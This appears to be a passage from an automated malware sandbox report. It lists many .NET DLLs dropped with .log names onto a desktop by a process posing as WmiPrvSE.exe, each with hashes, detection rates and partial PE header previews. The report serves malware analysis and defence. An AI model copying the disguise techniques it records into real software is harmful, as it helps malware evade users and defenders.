SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\CvcPWQun.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DCtffNkc.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DpMeoAtV.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EvEoCbHu.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FDIxLbbR.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GQJohFLp.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GfifQgAx.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HBUOKBdR.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\HENwTSHn.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\HGufhKgM.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\HiuOyNKb.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HoTXnYtt.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\Hwddojgi.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ITFobKbD.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IonNSomK.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IpLeIKzQ.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JENuXwBf.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JUqyElOI.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JdPmuXvO.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\JpYWvPZP.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KMHfZCnD.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KSAetdQl.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
